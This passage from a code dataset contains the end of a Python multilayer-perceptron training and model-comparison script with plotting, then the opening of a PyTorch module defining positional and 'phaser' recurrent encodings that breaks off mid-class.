[self.neurons_input] + self.neurons_hidden + [self.outputs]\n self.n_layers = self.layers_hidden + 2\n\n # Compute the number of weights per layer and the total number of weights in the 
network\n\n num_weights_layer = []\n for l in range(self.n_layers):\n num_weights_layer.append(self.weights_dimensions[l]*self.weights_dimensions[l+1])\n self.num_weights_layer = num_weights_layer\n self.num_weights = sum(num_weights_layer)\n\n # Name each layer to label plots\n\n self.name_layers()\n\n # Initialize lists to save results\n\n self.validation_errors =[]\n self.validation_avg_energy_errors=[]\n self.validation_local_gradients=[]\n self.validation_delta_ks =[]\n\n\n def name_layers(self):\n \"\"\"\n Auxiliary function that initializes a list with names for the layers\n \"\"\"\n self.layer_names = []\n for l in range(self.n_layers):\n type_layer = ''\n if l == 0:\n type_layer = 'input'\n elif l == self.n_layers-1:\n type_layer = 'output'\n else:\n type_layer = 'hidden'\n l_name = f\"{type_layer} layer\"\n if type_layer == 'hidden': \n l_name = l_name + str(l)\n self.layer_names.append(l_name)\n\n def get_energy(self,e_vector):\n \"\"\"Function that returns the instantaneous energy error\n\n Parameters\n ----------\n e_vector : numpy ndarray\n Error matrix \n \n Returns\n ----------\n float: instantaneous energy error\n \n \"\"\"\n return 0.5 * (sum(e_vector**2))\n\n def forward(self, x, weights):\n \"\"\" Function that performs a forward step.\n It calculates the local field and the activation value and propagates forward\n\n Parameters\n ----------\n X : numpy ndarray\n Input matrix\n weights: numpy ndarray\n Weights matrix \n\n Returns\n ----------\n Y: numpy ndarray of outputs of the last layer\n Yi: numpy ndarray of outputs of each layer\n Vi: numpy ndarray of local fields of each layer\n impulses: numpy ndarray of inputs of each layer\n \"\"\" \n Vi = []\n phi_i_v_i = x\n Yi = []\n for i in range(self.n_layers):\n wi = weights[i]\n vi = np.dot(phi_i_v_i,wi)\n Vi.append(vi)\n phi_i_v_i = self.num_phi(vi,i)\n Yi.append(phi_i_v_i)\n Y = Yi[-1]\n impulses = [x] + Yi\n return Y, Vi, Yi, impulses\n \n\n def num_phi(self, x, layer):\n \"\"\" Activation function\n It returns the layer's activation function applied to a specific value\n Parameters\n ----------\n X : numpy ndarray\n argument to aply the activation function to\n layer: int\n number of layer\n Returns\n ----------\n The layer's activation function applied to x\n \"\"\" \n if layer == 0:\n return 1 / (1 + np.exp(-x))\n elif layer == self.n_layers -1:\n return 1 / (1 + np.exp(-x))\n else:\n return 1 / (1 + np.exp(-x))\n\n\n def num_dphi(self, x, layer):\n \"\"\" Derivative of activation function\n It returns the derivative of the layer's activation function applied to a specific value\n\n Parameters\n ----------\n X : numpy ndarray\n argument to aply the derivative of the activation function to\n layer: int\n number of layer\n \n Returns\n ----------\n The derivative of the layer's activation function applied to x\n \"\"\" \n if layer == 0:\n return x * (1 - x)\n elif layer == self.n_layers -1:\n return x * (1 - x)\n else:\n return x * (1 - x)\n\n\n\n def gradient_descent(self, initial_values,epochs, eta, tol = 0.01):\n \"\"\" Function that implements the gradient descent algorithm\n\n Parameters\n ----------\n initial_values : [numpy ndarray]\n list of weight matrices (one per layer)\n epochs: int\n maximum epochs\n eta: float\n learning rate\n tol: float\n tolerance for stopping condition\n \n \"\"\" \n self.model_name = self.model_name + f' eta = {eta}'\n self.epochs = epochs\n \n assert len(initial_values) == self.n_layers, \"not enough initial weight matrices were passed\"\n energy_errors_av = []\n errors = []\n 
param_values = [np.zeros((self.epochs,self.num_weights_layer[l])) for l in range(self.n_layers)]\n dif_values = [np.zeros((self.epochs,self.num_weights_layer[l])) for l in range(self.n_layers)]\n local_grad_values = [np.zeros((self.epochs, 1)) for i in range(self.n_layers)]\n mean_delta_k_output = []\n \n error_it = 10000\n it = 0\n W = initial_values\n\n while it < epochs and error_it > tol:\n # forward\n Y, Vi, Yi, impulses = self.forward(self.X_train,W)\n local_gradients_it = []\n # batch back propagation starting from the output layer\n for layer in range(self.n_layers-1,-1,-1): \n if layer == self.n_layers -1:\n d = self.Yd_train\n error = d-Y\n energy = self.get_energy(error)\n avg_energy_error_it = np.mean(energy)\n errors = np.append(errors,error)\n energy_errors_av = np.append(energy_errors_av,avg_energy_error_it)\n # update the stopping criterion so the tol threshold takes effect\n error_it = avg_energy_error_it\n else:\n wi = W[layer+1]\n error = np.dot(delta_k,wi.T)\n dphi_vi = self.num_dphi(Yi[layer], layer)\n delta_k = error * dphi_vi\n local_gradients_it.append(delta_k)\n if layer == self.n_layers - 1:\n mean_delta_k_output = np.append(mean_delta_k_output,np.mean(delta_k))\n local_grad_values[layer][it] = np.mean(delta_k)\n \n # update_weights\n for layer in range(self.n_layers):\n index = self.n_layers - 1- layer\n impulse = impulses[layer]\n delta_k = local_gradients_it[index]\n \n dJdw = impulse.T.dot(delta_k)\n W[layer] = W[layer] + eta*dJdw\n param_values[layer][it,:] = W[layer].flatten().tolist()\n\n self.validation(W) \n\n it+=1\n \n\n self.param_values = param_values\n self.dif_values = dif_values\n self.local_gradients_array = local_grad_values\n\n self.errors = errors\n self.avg_energy_errors_training = energy_errors_av\n self.training_weights = W\n self.mean_delta_k_output = mean_delta_k_output\n\n def validation(self, W):\n \"\"\" Function that finds the predicted output on the validation set,\n it also finds one gradient to test the behaviour on the validation set.\n Training does not occur here, the model does not learn from the validation set\n\n Parameters\n ----------\n W : [numpy ndarray]\n weight matrix \n \"\"\" \n N_validation = self.Y_validation.shape[0]\n Y_validation = np.reshape(self.Y_validation,(N_validation,self.M))\n #foward\n Y, Vi, Yi, impulses = self.forward(self.X_validation,W)\n #backward to find error and local gradient\n layer = self.n_layers - 1\n validation_error = Y_validation -Y \n instantaneous_energy = 0.5 * (sum(validation_error**2))\n av_error = np.mean(instantaneous_energy)\n delta_k = validation_error * self.num_dphi(Y,layer)\n mean_delta_k = np.mean(delta_k)\n\n self.validation_errors = np.append(self.validation_errors,validation_error)\n self.validation_avg_energy_errors = np.append(self.validation_avg_energy_errors, av_error)\n self.validation_local_gradients = np.append(self.validation_local_gradients, delta_k)\n self.validation_delta_ks = np.append(self.validation_delta_ks, mean_delta_k)\n\n def test(self, X_test):\n \"\"\" Function that finds the predicted output on the test set\n Parameters\n ----------\n X_test : [numpy ndarray]\n Matrix of testing data\n \"\"\" \n Y, _,_,_ = self.forward(X_test,self.training_weights)\n self.Y_hat_test = Y\n\n def final_validate(self):\n \"\"\" Function that finds the predicted output on the validation set\n \"\"\" \n Y, _,_,_ = self.forward(self.X_validation,self.training_weights)\n self.y_hat_val = Y\n \n\n def graph(self):\n \"\"\" Auxiliary function to call other methods and generate graphs \"\"\" \n self.graph_errors()\n self.graph_gradients()\n \n def graph_gradients(self):\n 
\"\"\" Auxiliary function to graph local gradients \"\"\" \n assert len(self.local_gradients_array) == self.n_layers\n grads_array = np.hstack(self.local_gradients_array)\n df_grads = [pd.DataFrame(grads_array,columns=self.layer_names)]\n\n title = [r'Average local gradient $\\delta_k$']\n filepath = f'Results/Training/Gradients {self.model_name}.jpg'\n x_label = ['epoch']\n y_label = [r'$\\delta_k$']\n self.graph_dfs(df_grads, title,x_label, y_label,filepath)\n \n def graph_dfs(self, df_list,titles,x_labels, y_labels,filepath, size= (5,5)):\n \"\"\" Auxiliary function to graph multiple dataframes\n\n Parameters\n ----------\n df_list : [df]\n List of dataframes to plot\n titles: [str]\n list of titles\n x_labels: [str]\n list of labels along the x axis\n y_labels: [str]\n list of labels along the y axis\n filepath: str\n filepath to save the image\n size: (float,float)\n size of the image\n \"\"\" \n num_dfs = len(df_list)\n fig, ax = plt.subplots(num_dfs,1,figsize=size,sharex=True)\n if num_dfs == 1:\n df = df_list[0]\n df.plot(marker=\".\",rot=45,ax=ax,legend=True, title= titles[0])\n ax.set_xlabel(x_labels[0])\n ax.set_ylabel(y_labels[0])\n\n fig.tight_layout()\n plt.savefig(filepath,bbox_inches='tight')\n plt.close()\n else:\n for l in range(num_dfs):\n df = df_list[l]\n df.plot(marker=\".\",rot=45,ax=ax[l],legend=False, title= titles[l])\n ax[l].set_xlabel(x_labels[l])\n ax[l].set_ylabel(y_labels[l])\n lines0, labels0 = [sum(x, []) for x in zip(*[ax[l].get_legend_handles_labels()])]\n \n fig.tight_layout()\n plt.savefig(filepath)\n plt.close()\n\n def graph_errors(self):\n \"\"\" Auxiliary function to graph errors \"\"\" \n df_av_instantaneous_energy = [pd.DataFrame(self.avg_energy_errors_training,columns=['$\\mathcal{E}_{av}$'])]\n title = ['Average Instantaneous energy error $\\mathcal{E}_{av}$']\n filepath = f'Results/Training/Errors {self.model_name}.jpg'\n x_label = ['epoch']\n y_label = ['$\\mathcal{E}_{av}$']\n self.graph_dfs(df_av_instantaneous_energy, title,x_label, y_label,filepath)\n \n def save_results(self, list_dics, max_epochs,eta):\n \"\"\" Auxiliary function to run training, validation and testing and \n save relevant results of the model to a list of dictionaries\n \n Parameters\n ----------\n list_dics : [dict]\n List of dictionaries were the results of the model will be saved\n max_epochs: int\n maximum number of epochs\n eta: float\n learning rate\n \n \"\"\" \n self.initialize_gradient_descent(max_epochs,eta)\n self.test(self.X_test)\n self.final_validate()\n self.graph()\n \n list_dics[0][self.model_name] = self.avg_energy_errors_training\n list_dics[1][self.model_name] = self.validation_avg_energy_errors\n list_dics[2][self.model_name] = self.mean_delta_k_output\n list_dics[3][self.model_name] = self.validation_delta_ks\n list_dics[4][self.model_name] = self.Y_hat_test\n list_dics[5][self.model_name] = self.validation_avg_energy_errors[-1]\n list_dics[6][self.model_name] = self.num_weights\n list_dics[7][self.model_name] = self.y_hat_val\n \n\n\n def initialize_gradient_descent(self,epochs,eta):\n \"\"\" Auxiliary function to initialize weights in the hyercube [-1,1]\n and initialize gradient descent\n \n Parameters\n ----------\n list_dics : [dict]\n List of dictionaries were the results of the model will be saved\n max_epochs: int\n maximum number of epochs\n eta: float\n learning rate\n \"\"\" \n initial_values = []\n for i in range(self.n_layers):\n sizei = (self.weights_dimensions[i], self.weights_dimensions[i+1])\n wi = np.random.uniform(low=-1, 
high=1,size=sizei)\n assert self.num_weights_layer[i] == wi.shape[0]*wi.shape[1]\n initial_values.append(wi)\n self.gradient_descent(initial_values, epochs, eta)\n\n\nclass Comparison:\n \"\"\"\n Class to compare different multi layer perceptrons\n ...\n\n Attributes\n ----------\n data : np.array\n Numpy array (N x M) of the entire data set\n Xindex : [int]\n List of indices of the columns of the features or independent variables\n Yindex : [int]\n List of indices of the columns of the outputs or dependent variables\n hl_max : int\n maximum number of hidden layers, we iterate from 1 to hl_max\n hn_max : int\n maximum number of neurons per hidden layer, we iterate from 1 to hn_max\n etas : [float]\n list of learning rates to try for each architecture\n max_epochs : int\n maximum number of epochs for the training\n seed : int\n seed for the random number generator\n \"\"\"\n \n def __init__(self,data, Xindex, Yindex, hl_max, hn_max, etas, max_epochs, seed = None):\n\n self.data = data\n self.Xindex = Xindex\n self.Yindex = Yindex\n\n\n self.hl_max = hl_max\n self.hn_max = hn_max\n self.etas = etas\n self.max_epochs = max_epochs\n\n if seed is None:\n self.seed = int(np.pi*10**9)\n else:\n self.seed = seed\n\n \n\n self.create_paths(['Results', 'Results/Training', 'Results/Validation', 'Results/Test', 'Results/csv'])\n\n np.random.seed(self.seed)\n\n self.normalize()\n self.random_sample()\n\n self.global_args = (\n self.X_train,\n self.Y_train,\n self.X_validation,\n self.Y_validation,\n self.X_test\n )\n \n list_hn = list(range(1,hn_max+1))\n mlp_params_list = [etas,list_hn]\n self.mlp_params_combinations = list(cartesian_product(*mlp_params_list))\n\n\n self.results = {}\n self.save_models_results()\n self.plot_results()\n \n\n def normalize(self):\n \"\"\"Function to normalize the data between 0 and 1\"\"\"\n self.norm_data = (self.data - np.min(self.data, axis=0)) / (np.max(self.data, axis=0) - np.min(self.data, axis=0))\n\n \n def random_sample(self):\n \"\"\"Function to randomly sample the data and split the data set into training, validation and test sets\"\"\"\n indices = np.arange(self.norm_data.shape[0])\n (\n data_train,\n data_tv,\n self.indices_train,\n indices_tv,\n ) = train_test_split(self.norm_data, indices, test_size=0.4, random_state=self.seed)\n indices_in_tv = np.arange(data_tv.shape[0])\n (\n data_test,\n data_validation,\n indices_test_in_tv,\n indices_val_in_tv,\n ) = train_test_split(data_tv, indices_in_tv, test_size=0.5, random_state=self.seed)\n\n self.index_test = indices_tv[indices_test_in_tv]\n self.indices_val = indices_tv[indices_val_in_tv] \n\n self.X_train = data_train[:, self.Xindex]\n self.Y_train = data_train[:, self.Yindex]\n\n self.X_test = data_test[:, self.Xindex]\n self.Y_test = data_test[:, self.Yindex]\n \n self.X_validation = data_validation[:, self.Xindex]\n self.Y_validation = data_validation[:, self.Yindex]\n\n self.Y_test = self.Y_test.reshape(-1,1)\n\n self.X_train_sorted = self.X_train[np.argsort(self.indices_train)]\n self.Y_train_sorted = self.Y_train[np.argsort(self.indices_train)]\n\n self.X_test_sorted = self.X_test[np.argsort(self.index_test)]\n self.Y_test_sorted = self.Y_test[np.argsort(self.index_test)]\n\n self.X_validation_sorted = self.X_validation[np.argsort(self.indices_val)]\n self.Y_validation_sorted = self.Y_validation[np.argsort(self.indices_val)]\n\n \n def save_models_results(self):\n \"\"\" Function to save the results of the models in a dictionary\"\"\"\n for hl in range(1, self.hl_max + 1):\n results_dics = [{} for i in range(8)]\n\n for (lr,hn) in self.mlp_params_combinations:\n args = self.global_args + 
(hl,hn)\n mlp = Perceptron(*args)\n mlp.save_results(results_dics, self.max_epochs,lr)\n self.results[str(hl)] = results_dics\n\n def plot_comparison(self,data,indexes, label_names, title, x_label, y_label, filepath, size, plot_pred = False, obs=None):\n \"\"\" Function to plot comparisons between models\n Parameters\n ----------\n data : dict\n Dictionary with the data to plot, the dictionary contains the name of the model as key and the predicted values as values\n indexes : [str]\n List of the names of the models to plot\n label_names : [str]\n List of the labels of the models to plot (best, avg, worst for example)\n title : str\n Title of the plot\n x_label : str\n Label of the x axis\n y_label : str\n Label of the y axis\n filepath : str\n Path to save the image of the plot\n size : tuple\n Size of the plot\n plot_pred : bool\n Boolean that signifies if the plot is of the predictions or not\n obs : np.array\n Array of the observed values, only used if plot_pred is True\n \"\"\"\n fig, ax = plt.subplots(1,1,figsize=size,sharex=True) \n if plot_pred:\n ax.plot(obs, \".-\", label=\"Observations\")\n print(\"plotting obs\")\n for label_name, index in zip(label_names,indexes):\n label_i = f\"{index} ({label_name})\"\n ax.plot(data[index], \".-\", label=label_i)\n ax.set_xlabel(x_label)\n ax.set_ylabel(y_label)\n ax.legend(framealpha=1)\n # fig.tight_layout()\n fig.suptitle(title)\n plt.savefig(filepath, bbox_inches='tight')\n plt.close()\n \n def set_params(self,type_plot, stage, name):\n \"\"\" Function to set the parameters of the plot\n Parameters\n ----------\n type_plot : str\n Type of plot to make, can be 'error', 'local_grad' or 'pred'\n stage : str\n Stage of the data to plot, can be 'training', 'validation' or 'test'\n name : str\n name of the model\n Returns\n -------\n plot_title : str\n Title of the plot\n x_label : str\n Label of the x axis\n y_label : str\n Label of the y axis\n filepath : str\n Path to save the image of the plot\n \"\"\"\n \n if type_plot == 'error':\n x_label = \"epochs\"\n y_label = r\"$\\mathcal{E}_{av}$\"\n fig_title = 'Energy error'\n if name:\n plot_title = r\"$\\mathcal{E}_{av}$\" + f\" ({stage})\"\n elif type_plot == 'local_grad':\n x_label = \"epochs\"\n y_label = r\"$\\delta_k$\"\n fig_title = \"Local output gradients\"\n plot_title = r\"Avg $\\delta_k$\" + f\" ({stage})\"\n else:\n x_label = \"p\"\n y_label = \"Y\"\n fig_title = \"Pred vs obs\"\n plot_title = f\"Comparison of predicted and observed values\"\n file_path = f\"Results/{stage}/{fig_title} in {stage}\" \n if name is not None:\n hl = name[-1]\n plot_title = plot_title + f\" with {hl} hidden layer(s)\"\n file_path = file_path + f\" hl={hl}.png\"\n return plot_title, x_label, y_label, file_path\n\n \n def sort_by_value(self,dic):\n \"\"\" Function to sort a dictionary by its values\"\"\"\n return dict(sorted(dic.items(), key=lambda x:x[1]))\n \n\n def rank_models(self,last_errors, n_weight_matrices):\n \"\"\" Function to rank the models by their simplicity and error\n Parameters\n ----------\n last_errors : dict\n Dictionary with the name of the model as key and the error of the last epoch as value\n n_weight_matrices : dict\n Dictionary with the name of the model as key and the number of weight matrices as value\n Returns\n -------\n best : str\n Name of the best model\n avg : str\n Name of the average model\n worst : str\n Name of the worst model\n \"\"\"\n sorted_by_errors = self.sort_by_value(last_errors)\n sorted_params = {}\n for key in sorted_by_errors:\n sorted_params[key] = 
n_weight_matrices[key]\n sorted_simplicity = self.sort_by_value(sorted_params)\n ordered_models = list(sorted_simplicity.keys())\n indexes = [0,-len(ordered_models)//2-1,-1]\n best = ordered_models[indexes[0]]\n avg = ordered_models[indexes[1]]\n worst = ordered_models[indexes[2]]\n return best, avg, worst\n\n def plot_stage(self, data, plot_type, hl, size, indexes, label_names):\n \"\"\" Function that plots the results of the training and validation stages\n Parameters\n ----------\n data : [dict]\n List of dictionaries with the data to plot, the dictionary contains the name of the model as key and the predicted values as values\n plot_type : str\n Type of plot to make, can be 'error', 'local_grad' or 'pred'\n hl : int\n Number of hidden layers of the models to plot\n size : tuple\n Size of the plot\n indexes : [str]\n List of the names of the models to plot\n label_names : [str]\n List of the labels of the models to plot (best, avg, worst for example)\n \"\"\"\n\n stages = ['training', 'validation']\n for i in range(len(data)):\n plot_title, x_label, y_label, filepath = self.set_params(plot_type, stages[i], hl)\n self.plot_comparison(data[i],indexes, label_names, plot_title, x_label, y_label, filepath, size)\n\n\n \n def plot_results(self):\n \"\"\"Function that finds the best, average and worst model, plots the results of the predictions,\n saves the errors of the models and makes comparison plots between models with the same number of\n hidden layers\n \"\"\"\n test_errors_pairs = []\n test_errors = []\n validation_errors = []\n val_errors = []\n val_preds = []\n test_preds = []\n\n for hl in self.results:\n predictions_models = self.results[hl][4]\n for key in predictions_models:\n pred_not_sorted = predictions_models[key]\n y_pred = pred_not_sorted[np.argsort(self.index_test)]\n test_error = np.mean(np.power(self.Y_test_sorted - y_pred,2))\n test_errors.append(test_error)\n test_errors_pairs.append((key, test_error))\n test_preds.append(y_pred)\n predictions_models_vals = self.results[hl][7]\n\n for key in predictions_models_vals:\n \n pred_not_sorted_val = predictions_models_vals[key]\n y_pred_val = pred_not_sorted_val[np.argsort(self.indices_val)]\n\n error_val = np.mean(np.power(self.Y_validation - y_pred_val,2))\n val_preds.append(y_pred_val)\n val_errors.append(error_val)\n validation_errors.append((key, error_val))\n \n self.plot_best(val_errors, val_preds, validation_errors, 'validation')\n self.plot_best(test_errors, test_preds, test_errors_pairs, 'test')\n\n\n df = pd.DataFrame(test_errors_pairs, columns=['model', 'test_error'])\n df.to_csv('Results/csv/test_errors.csv', index=True)\n df = pd.DataFrame(validation_errors, columns=['model', 'validation_error'])\n df.to_csv('Results/csv/validation_errors.csv', index=True)\n\n for hl in self.results:\n \n results_dics = self.results[hl]\n best,avg,worst = self.rank_models(results_dics[5],results_dics[6])\n\n label_names = ['best', 'avg', 'worst']\n indexes = [best, avg, worst]\n \n size = (6,5)\n \n graph_types = ['error', 'local_grad']\n for i in range(len(graph_types)):\n self.plot_stage(results_dics[2*i:2*(i+1)], graph_types[i], hl, size, indexes, label_names)\n plot_title, x_label, y_label, filepath = self.set_params('pred', 'Test', hl)\n self.plot_comparison(results_dics[4],indexes, label_names, plot_title, x_label, y_label, filepath, size, plot_pred = True, obs=self.Y_test)\n\n def plot_best(self, val_errors, val_preds, validation_errors, stage):\n \"Function to plot the predictions of the best model\"\n 
sort_val = np.argsort(val_errors)\n best_i = sort_val[0]\n avg_i = sort_val[len(sort_val)//2 -1]\n worst_i = sort_val[-1]\n\n best_model = val_preds[best_i]\n avg_model = val_preds[avg_i]\n worst_model = val_preds[worst_i]\n\n best_model_name = validation_errors[best_i][0]\n avg_model_name = validation_errors[avg_i][0]\n worst_model_name = validation_errors[worst_i][0]\n\n\n data = {\n best_model_name: best_model,\n avg_model_name: avg_model,\n worst_model_name: worst_model\n }\n indexes = [best_model_name,avg_model_name,worst_model_name]\n label_names = ['best', 'avg', 'worst']\n\n size = (7,7)\n\n plot_title, x_label, y_label, filepath = self.set_params('pred', stage, None)\n self.plot_comparison(data,indexes, label_names, plot_title, x_label, y_label, filepath, size, plot_pred = True, obs=self.Y_validation)\n\n data_best = {\n best_model_name: best_model\n }\n indexes = [best_model_name]\n label_names = ['best']\n plot_title = 'Predicted values of the best model vs real observations'\n x_label = 'P'\n y_label = 'Y'\n filepath = 'Results/Test/best pred.png'\n self.plot_comparison(data_best,indexes, label_names, plot_title, x_label, y_label, filepath, size, plot_pred = True, obs=self.Y_validation)\n \n\n\n def plot_validation(self, df_list,titles,x_labels, y_labels,filepath, size= (5,5)):\n \"\"\" Function to plot the results of the validation stage\n Parameters\n ----------\n df_list : [pd.DataFrame]\n List of dataframes with the data to plot\n titles : [str]\n List of the titles of the plots\n x_labels : [str]\n List of the labels of the x axis\n y_labels : [str]\n List of the labels of the y axis\n filepath : str\n Path to save the image of the plot\n size : tuple\n Size of the plot\n \n \"\"\"\n num_dfs = len(df_list)\n fig, ax = plt.subplots(num_dfs,1,figsize=size,sharex=True)\n for l in range(num_dfs):\n df = df_list[l]\n df.plot(marker=\".\",rot=45,ax=ax[l],legend=False, title= titles[l])\n ax[l].set_xlabel(x_labels[l])\n ax[l].set_ylabel(y_labels[l])\n lines0, labels0 = [sum(x, []) for x in zip(*[ax[l].get_legend_handles_labels()])]\n \n fig.tight_layout()\n plt.savefig(filepath,bbox_inches='tight')\n plt.close()\n \n\n def create_paths(self, directories):\n \"\"\" Function to create directories to save the results\"\"\"\n for directory in directories:\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n\ndef get_data():\n \"\"\" Function to get the data from the file data.txt\n Returns\n -------\n data : np.array\n Numpy array (N x M) of the entire data set\n Xindex : [int]\n List of indices of the columns of the features or independent variables\n Yindex : [int]\n List of indices of the columns of the outputs or dependent variables\n \"\"\"\n data = np.loadtxt('Data/data.txt', delimiter=',')\n Xindex = [0,1,2,3]\n Yindex = [4]\n return data, Xindex, Yindex\n\n\nif __name__ == \"__main__\":\n\n data, Xindex, Yindex = get_data()\n compare = Comparison(data, Xindex, Yindex ,3,5,[0.2,0.5,0.9],50)","repo_name":"msuribec/IANN","sub_path":"src/perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":31424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23340129630","text":"import math\n\nimport torch\nfrom torch import nn\n\n\ndef positional_encoding(max_len, d_model):\n pe = torch.zeros(max_len, d_model)\n position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)\n # Changed log from 10_000.0 to max_len, improves accuracy for hard labyrinth\n div_term = torch.exp(\n 
torch.arange(0, d_model, 2).float() * (-math.log(max_len) / d_model)\n )\n pe[:, 0::2] = torch.sin(position * div_term)\n pe[:, 1::2] = torch.cos(position * div_term)\n return pe\n\n\n@torch.jit.script\ndef _psi(ab: torch.Tensor, c: torch.Tensor, t_minus_i: torch.Tensor) -> torch.Tensor:\n # ab: [1, T, F ... F]\n # c: [1, T, 1 ... 1]\n # t_minus_i: [1, T, 1 ... 1]\n return torch.exp(c * ab * t_minus_i)\n\n\n@torch.jit.script\ndef _compute_state(\n ab: torch.Tensor,\n c: torch.Tensor,\n x: torch.Tensor,\n n_to_zero: torch.Tensor,\n one_to_np1: torch.Tensor,\n T: int,\n prev_state: torch.Tensor,\n):\n state = torch.cumsum(x * _psi(ab, c, n_to_zero[:T]), dim=1) * _psi(\n ab, c, -n_to_zero[:T]\n )\n # Add to previous output\n # Shift the previous inputs by 1 to T\n # because they are now 1 to T timesteps older with the\n # addition of T new timesteps present in x\n psi_shift = _psi(ab, c, one_to_np1[:T])\n shifted_prev_state = prev_state * psi_shift\n output = state + shifted_prev_state\n return output\n\n\nclass PhaserEncoding(nn.Module):\n def __init__(\n self,\n max_len: int,\n d_model: int,\n num_dims: int,\n max_period: int = 1024,\n dtype: torch.dtype = torch.double,\n decay_bias: float = -0.5,\n freq_scale: float = 1.0,\n fudge_factor: float = 0.025,\n soft_clamp: bool = False,\n ):\n \"\"\"A phaser-encoded aggregation operator\n Inputs:\n max_len: Maximum length of the batch in timesteps. Note this\n is not the episode length, but rather the batch length.\n d_model: Feature dimension of the model\n num_dims: Number of feature dimensions of the model, each should be\n of size d_model\n max_period: This determines the initial maximum sinusoidal period. It should\n be set to the maximum episode length if known. Until the parameters\n change, the model will be unable to differentiate relative time\n differences greater than max_period.\n dtype: Whether to use floats or doubles. Note doubles enables\n significantly more representational power for a little\n extra compute\n decay_bias: How much bias to exponential decay. Higher -> biased\n towards shorter-term memory. This should roughly be between 0 and 5\n since this value goes through a sigmoid activation.\n freq_scale: How much to bias the sinusoidal part of the encoding.\n Lower -> lower frequencies, biased towards longer-term memory\n and being unable to tell the difference between x_t and x_{t+1}\n Higher -> higher frequencies, biased towards quick reactions/control\n and more likely to differentiate between x_t and x_{t+1}\n This should be a positive number.\n fudge_factor: A small positive number to prevent overflows\n \"\"\"\n super().__init__()\n self.num_dims = num_dims\n self.d_model = d_model\n # Set the upper bound to zero because our prior knowledge\n # dictates experiences from the past never become stronger,\n # only fade. Also, this could cause explosions as we magnify\n # values at each timestep\n # To prevent overflows, ensure exp(limit * max_len) < {float,double}\n # limit * max_len < log({float,double})\n # limit == log({float,double}) / max_len - fudge_factor\n assert dtype in [torch.float, torch.double]\n self.dtype = dtype\n dtype_max = torch.finfo(dtype).max\n self.limit = math.log(dtype_max) / max_len - fudge_factor\n self.soft_clamp = soft_clamp\n\n # [1, 1 | 1, ... 1, F]\n # [B, T | F, ... 
F, F]\n param_shape = [1, 1] + [self.d_model] * num_dims\n a = torch.linspace(\n 0 - fudge_factor, -self.limit + fudge_factor, self.d_model**num_dims\n ).reshape(param_shape)\n b = (\n 2\n * torch.pi\n / torch.linspace(max_period, torch.pi, self.d_model**num_dims).reshape(\n param_shape\n )\n )\n # b = b.flatten()[torch.randperm(b.numel())].reshape(b.shape)\n self.c = nn.Parameter(torch.tensor(decay_bias))\n self.d = nn.Parameter(torch.tensor(freq_scale))\n self.ab = nn.Parameter(torch.complex(a, b))\n\n torch.nn.init.normal_(self.ab.real, mean=0, std=0.01)\n self.ab.real.data.clamp_(-self.limit + fudge_factor, 0 - fudge_factor)\n\n n_to_zero = torch.arange(max_len, dtype=dtype).flip(0)\n self.register_buffer(\"n_to_zero\", n_to_zero)\n one_to_np1 = torch.arange(1, max_len + 1, dtype=dtype)\n self.register_buffer(\"one_to_np1\", one_to_np1)\n\n def psi(self, t_minus_i):\n assert t_minus_i.dim() == 1\n\n T = t_minus_i.shape[0]\n F = [self.d_model] * self.num_dims\n broadcast = [1] * len(F)\n # Compute for all filters/fourier series terms\n # e^(t * (a + bi))\n if self.soft_clamp:\n real = -self.limit * (self.c + self.ab.real).sigmoid()\n else:\n real = (self.c + self.ab.real).clamp(-self.limit, 0)\n imag = self.d * self.ab.imag\n return torch.exp(\n torch.complex(real, imag) * t_minus_i.reshape(1, T, *broadcast)\n )\n # return _psi(self.ab, self.c, t_minus_i.reshape(1, T, *broadcast))\n\n def recurrent_update2(self, x, state):\n B, T, *F = x.shape\n\n prev_state = torch.view_as_complex(state)\n ones = torch.tensor([-1.0, 1.0], dtype=torch.complex128, device=x.device)\n\n if self.training:\n psi_minus_one, psi_one = self.psi(ones).unbind(1)\n else:\n psi_minus_one, psi_one = self.psi(ones).unbind(1)\n psi_n_to_zero = psi_one.expand(1, T, -1, -1, -1).cumprod(1).flip(1)\n minus_psi_n_to_zero = psi_minus_one.expand(1, T, -1, -1, -1).cumprod(1).flip(1)\n\n # Convert back to float for performance\n state = torch.cumsum(x * psi_n_to_zero, dim=1) * minus_psi_n_to_zero\n\n shift = psi_n_to_zero.flip(1) * psi_one\n shifted_prev_state = prev_state * shift\n output = state + shifted_prev_state\n return output.to(torch.complex64)\n\n def recurrent_update(self, x, state):\n B, T, *F = x.shape\n prev_state = torch.view_as_complex(state)\n\n state = torch.cumsum(x * self.psi(self.n_to_zero[:T]), dim=1) * self.psi(\n -self.n_to_zero[:T]\n )\n # Add to previous output\n # Shift the previous inputs by 1 to T\n # because they are now 1 to T timesteps older with the\n # addition of T new timesteps present in x\n psi_shift = self.psi(self.one_to_np1[:T])\n shifted_prev_state = prev_state * psi_shift\n output = state + shifted_prev_state\n return output.to(torch.complex64)\n\n def forward(self, x, state):\n return self.recurrent_update(x, state)\n\n\nclass ScaledPositionalEncoding(nn.Embedding):\n def __init__(self, num_embeddings, embedding_dim, **kwargs):\n super().__init__(num_embeddings, embedding_dim, **kwargs)\n self.a = nn.Parameter(torch.rand(embedding_dim))\n num_zero_weights = round(0.75 * embedding_dim)\n zero_idx = torch.randperm(embedding_dim)[:num_zero_weights]\n self.a.data[zero_idx] = 0\n\n def forward(self, idx):\n return super().forward(idx) * self.a\n\n\nclass SimpleScaledEncoding(nn.Module):\n def __init__(self, max_len, d_model):\n super().__init__()\n v = torch.zeros(d_model)\n v[-4:] = 1.0 / max_len\n self.register_buffer(\"v\", v)\n\n def forward(self, idx):\n return idx.reshape(-1, 1) * self.v\n\n\nclass Time2Vec(nn.Module):\n def __init__(self, max_len, d_model):\n super().__init__()\n 
